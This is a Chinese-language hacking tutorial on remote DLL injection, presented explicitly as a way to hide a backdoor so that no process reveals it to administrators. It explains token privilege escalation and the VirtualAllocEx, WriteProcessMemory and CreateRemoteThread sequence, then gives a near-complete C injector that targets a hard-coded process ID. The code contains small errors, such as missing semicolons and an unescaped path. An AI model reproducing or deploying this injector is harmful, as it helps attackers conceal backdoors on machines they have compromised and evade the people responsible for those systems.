遠程注入DLL
沒錯,現在討論的就是傳說中的遠程注入技術,目前一種非常流行的隱藏技術,因為它沒有進程,而前面討論的兩種方法都會有進程出現,因此,有經驗的管理員很容易發現,然后先殺進程,在找出后門文件刪除。要實現遠程注入,我們要編寫兩個程序,一個是后門文件,這里不是把它寫成.exe文件,而是寫成.dll文件,在這里先說一下.dll文件,.dll文件,其實就是動態連接庫,它里面裝封了提供.exe文件調用的函數,一般情況下,雙擊它,是不能運行它的,它只能由.exe來調用,于是就有了遠程注入了,原理很簡單:我們把后門的主要功能寫成一個函數,然后裝封到.dl文件中,然后再另外寫一個執行文件來啟動它,這樣就不會有后門的進程了。那遠程注入又指什么呢?這個問題問得好,一般情況下,每個進程都有自己的私有空間,理論上,別的進程是不允許對這個私人空間進行操作的,但是,我們可以利用一些方法進入這個空間并進行操作,將自己的代碼寫入正在運行的進程中,于是就有了遠程注入了。
對dll后門的編寫就不作過多的討論了,現在來看實現注入功能的可執行文件的編寫:
用到的函數有:
OpenProcessToken();
LookupPrivilegeValue();
AdjustTokenPrivileges();
OpenProcess();
VirtualAllocEx();
WriteProcessMemory();
GetProcAddress();
CreateRemoteThread();
先簡單的介紹以下這些函數的作用,因為我們要操作的是系統中的其他進程,如果沒有足夠的系統權限,我們是無法寫入甚至連讀取其它進程的內存地址的,所以我們就需要提升自己的權限,用到以下3個函數
OpenProcessToken(); //打開進程令牌
LookupPrivilegeValue();//返回一個本地系統獨一無二的ID,用于系統權限更改
AdjustTokenPrivileges();//從英文意思也能看出它是更改進程權限用的吧?
進入宿主進程的內存空間
在擁有了進入宿主進程空間的權限之后,我們就需要在其內存加入讓它加載我們后門的代碼了,用LoadLibraryA()函數就可以加載我們的DLL了,它只需要DLL文件的路徑就可以了,在這里我們要把DLL文件的路徑寫入到宿主的內存空間里,因為DLL的文件路徑并不存在于宿主進程內存空間了,用到的函數有:
OpenProcess();//用于修改宿主進程的一些屬性,詳細參看MSDN
VirtualAllocEx();//用于在宿主內存空間中申請內存空間以寫入DLL的文件名
WriteProcessMemory();//往申請到的空間中寫入DLL的文件名
在宿主中啟動新的線程
用的是LoadLibraryA()函數來加載,但在使用LoadLibraryA()之前必須知道它的入口地址,所以用GetProcAdress來獲得它的入口地址,有了它的地址以后,就可以用CreateRemoteThread()函數來啟動新的線程了,到次,整個注入過程完成,不過還不非常完善,這就留給聰明的你來完成了;)。
簡單的例子:
#include "stdafx.h"
int EnableDebugPriv(const char * name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
//打開進程令牌環
OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
&hToken);
//獲得進程本地唯一ID
LookupPrivilegeValue(NULL,name,&luid)
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = luid;
//調整權限
AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
return 0;
}
BOOL InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId)
{
HANDLE hRemoteProcess;
EnableDebugPriv(SE_DEBUG_NAME)
//打開遠程線程
hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD | //允許遠程創建線程PROCESS_VM_OPERATION | //允許遠程VM操作
PROCESS_VM_WRITE,//允許遠程VM寫
FALSE, dwRemoteProcessId );
char *pszLibFileRemote;
//使用VirtualAllocEx函數在遠程進程的內存地址空間分配DLL文件名空間
pszLibFileRemote = (char *) VirtualAllocEx( hRemoteProcess, NULL, lstrlen(DllFullPath)+1,
MEM_COMMIT, PAGE_READWRITE);
//使用WriteProcessMemory函數將DLL的路徑名寫入到遠程進程的內存空間
WriteProcessMemory(hRemoteProcess,
pszLibFileRemote, (void *) DllFullPath, lstrlen(DllFullPath)+1, NULL);
//計算LoadLibraryA的入口地址
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
//啟動遠程線程LoadLibraryA,通過遠程線程調用創建新的線程
HANDLE hRemoteThread;
if( (hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL) ) == NULL)
{
printf("CreateRemoteThread error!\n");
return FALSE;
}
return TRUE;
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
InjectDll("c:\zrqfzr.dll",3060) //這個數字是你想注入的進程的ID號
return 0;
}